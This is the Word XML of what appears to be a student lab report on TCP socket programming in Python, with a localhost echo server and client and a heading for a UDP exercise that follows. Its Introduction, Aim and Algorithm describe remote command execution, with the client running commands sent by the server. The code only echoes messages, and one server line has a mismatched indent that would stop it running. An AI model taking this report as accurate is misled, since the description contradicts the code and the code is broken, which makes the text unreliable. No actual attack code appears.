    <w:p w14:paraId="3A3B0220" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="545B9AD8" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="73CD065C" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="2F267D6E" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="00B93E3F" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="4FFAD760" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="63A8C467" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="3D54A889" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="67F9D08F" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="5440F3FA" w14:textId="77777777" w:rsidR="00B207D8" w:rsidRDefault="00B207D8" w:rsidP="00B55643"/>
    <w:p w14:paraId="3FDFD8A4" w14:textId="3E3812C0" w:rsidR="00152696" w:rsidRDefault="001E5243" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>STUDY OF TCP USING SOCKET PROGRAMMING IN PYTHON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52C0C4" w14:textId="77777777" w:rsidR="001E5243" w:rsidRDefault="001E5243" w:rsidP="001E5243"/>
    <w:p w14:paraId="55DB8421" w14:textId="75A8A538" w:rsidR="001E5243" w:rsidRDefault="00DA6EED" w:rsidP="001E5243">
      <w:r>
        <w:t>Ex. No</w:t>
      </w:r>
      <w:r w:rsidR="001E5243">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A60065">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF1AB8" w14:textId="77777777" w:rsidR="001E5243" w:rsidRDefault="001E5243" w:rsidP="001E5243"/>
    <w:p w14:paraId="13DD8517" w14:textId="19245B65" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344788D1" w14:textId="77777777" w:rsidR="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:r w:rsidRPr="0088223B">
        <w:t>A server and client that communicate over TCP: the server sends text commands; the client runs them and returns the output plus its current working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB8E46" w14:textId="77777777" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B"/>
    <w:p w14:paraId="37587C03" w14:textId="578DD67D" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A60DF" w14:textId="77777777" w:rsidR="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:r w:rsidRPr="0088223B">
        <w:t>Demonstrate basic TCP communication and remote command execution between two Python programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D0A4A" w14:textId="77777777" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B"/>
    <w:p w14:paraId="3583266D" w14:textId="4E908862" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365EE28" w14:textId="77777777" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:t>Server: listen on a port, accept a client, read commands from the user, send commands to client, print responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E1DBD" w14:textId="77777777" w:rsidR="0088223B" w:rsidRPr="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:t>Client: connect to server, receive commands, if cd then change directory, otherwise run the command, send back output and current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3377D81E" w14:textId="77777777" w:rsidR="0088223B" w:rsidRDefault="0088223B" w:rsidP="0088223B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0088223B">
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0088223B">
        <w:t>quit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0088223B">
        <w:t xml:space="preserve"> close the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D53EB0" w14:textId="77777777" w:rsidR="00496656" w:rsidRPr="0088223B" w:rsidRDefault="00496656" w:rsidP="00496656">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE1B4AF" w14:textId="718EEC0C" w:rsidR="001E5243" w:rsidRDefault="00496656" w:rsidP="001E5243">
      <w:r w:rsidRPr="00496656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775347A4" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131EA750" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>sockfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A057684" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>'Socket Created')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA9E4B" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>sockfd.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(('localhost',55555))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99507A" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:lastRenderedPageBreak/>
        <w:t>sockfd.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B131DD" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>'Waiting for connections')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CFDAA" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C4391" w14:textId="77777777" w:rsidR="00265303" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd,addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>sockfd.accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8DF3A" w14:textId="6538EDC7" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>receivedMsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(1024</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18288DD6" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">"Connected with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D61572" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">"Message Received from Client: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>receivedMsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0193ED" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(bytes(receivedMsg,'utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D94B8F2" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>"Message reply sent to Client!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D88118E" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">"Do you want to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>continue(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>type y or n):")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58162ECE" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    choice=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E73D8" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">    if choice=='n':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F0B98" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C257FB6" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A131DF" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>socket.SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A843C" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(('localhost',55555))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0913CF29" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:r w:rsidRPr="00DC25ED">
        <w:t>name=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>"Enter your message:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF1B67" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(bytes(name,'utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB3181" w14:textId="77777777" w:rsidR="00DC25ED" w:rsidRPr="00DC25ED" w:rsidRDefault="00DC25ED" w:rsidP="00DC25ED">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t xml:space="preserve">"Message Received from Server: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>clientfd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>(1024</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC25ED">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50500D3A" w14:textId="77777777" w:rsidR="00496656" w:rsidRDefault="00496656" w:rsidP="001E5243"/>
    <w:p w14:paraId="2B0968D0" w14:textId="54B203EF" w:rsidR="00496656" w:rsidRDefault="00265303" w:rsidP="001E5243">
      <w:r w:rsidRPr="00265303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C09E8" w14:textId="77777777" w:rsidR="00195619" w:rsidRDefault="00A23A88" w:rsidP="00A4544F">
      <w:r>
        <w:t>Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F9D32" w14:textId="77777777" w:rsidR="00195619" w:rsidRDefault="00195619" w:rsidP="00A4544F"/>
    <w:p w14:paraId="017BE79E" w14:textId="7176AB71" w:rsidR="00A4544F" w:rsidRPr="00A4544F" w:rsidRDefault="00A4544F" w:rsidP="00A4544F">
      <w:r w:rsidRPr="00A4544F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34321C7E" wp14:editId="2A9E1523">
            <wp:extent cx="5731510" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="10058279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424940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48160E79" w14:textId="50649F84" w:rsidR="00265303" w:rsidRDefault="00A23A88" w:rsidP="001E5243">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FFF8E" w14:textId="3B9361FC" w:rsidR="00195619" w:rsidRPr="00195619" w:rsidRDefault="00195619" w:rsidP="00195619">
      <w:r w:rsidRPr="00195619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142F9CD3" wp14:editId="0FE98233">
            <wp:extent cx="5731510" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2044697400"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97400" name="Picture 4" descr="A screen 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125980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791AE71" w14:textId="77777777" w:rsidR="00A23A88" w:rsidRDefault="00A23A88" w:rsidP="001E5243"/>
    <w:p w14:paraId="248526ED" w14:textId="77777777" w:rsidR="00B247DF" w:rsidRDefault="00195619" w:rsidP="001E5243">
      <w:r w:rsidRPr="00195619">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B247DF" w:rsidRPr="00B247DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3A0775" w14:textId="14CF1AF9" w:rsidR="00195619" w:rsidRDefault="00B247DF" w:rsidP="001E5243">
      <w:r w:rsidRPr="004F60DF">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:t>TC</w:t>
      </w:r>
      <w:r w:rsidRPr="004F60DF">
        <w:t>P client successfully sent messages to the server, and the server received and replied to each message</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6699CD" w14:textId="77777777" w:rsidR="00C157DA" w:rsidRDefault="00C157DA" w:rsidP="001E5243"/>
    <w:p w14:paraId="3A7AF12F" w14:textId="77777777" w:rsidR="00195619" w:rsidRPr="001E5243" w:rsidRDefault="00195619" w:rsidP="001E5243"/>
    <w:p w14:paraId="1419A7CD" w14:textId="77777777" w:rsidR="00152696" w:rsidRDefault="00152696" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDE0A3F" w14:textId="77777777" w:rsidR="00152696" w:rsidRDefault="00152696" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DBB9C1" w14:textId="77777777" w:rsidR="00152696" w:rsidRDefault="00152696" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2E8F6F" w14:textId="77777777" w:rsidR="002C6AEF" w:rsidRDefault="002C6AEF" w:rsidP="002C6AEF"/>
    <w:p w14:paraId="7F5B0F8A" w14:textId="77777777" w:rsidR="002C6AEF" w:rsidRDefault="002C6AEF" w:rsidP="002C6AEF"/>
    <w:p w14:paraId="45A2F007" w14:textId="77777777" w:rsidR="002C6AEF" w:rsidRPr="002C6AEF" w:rsidRDefault="002C6AEF" w:rsidP="002C6AEF"/>
    <w:p w14:paraId="08F72D6E" w14:textId="77777777" w:rsidR="000C312B" w:rsidRDefault="000C312B" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CB489E" w14:textId="77777777" w:rsidR="002C6AEF" w:rsidRDefault="002C6AEF" w:rsidP="002C6AEF"/>
    <w:p w14:paraId="69F3F19C" w14:textId="77777777" w:rsidR="002C6AEF" w:rsidRPr="002C6AEF" w:rsidRDefault="002C6AEF" w:rsidP="002C6AEF"/>
    <w:p w14:paraId="70947563" w14:textId="030619BA" w:rsidR="00C40206" w:rsidRDefault="001E5243" w:rsidP="00894973">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00894973">
        <w:t>TUDY OF UDP USING SOCKET PROGRAMMING IN PYTHON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398A700" w14:textId="77777777" w:rsidR="00894973" w:rsidRDefault="00894973" w:rsidP="00894973"/>
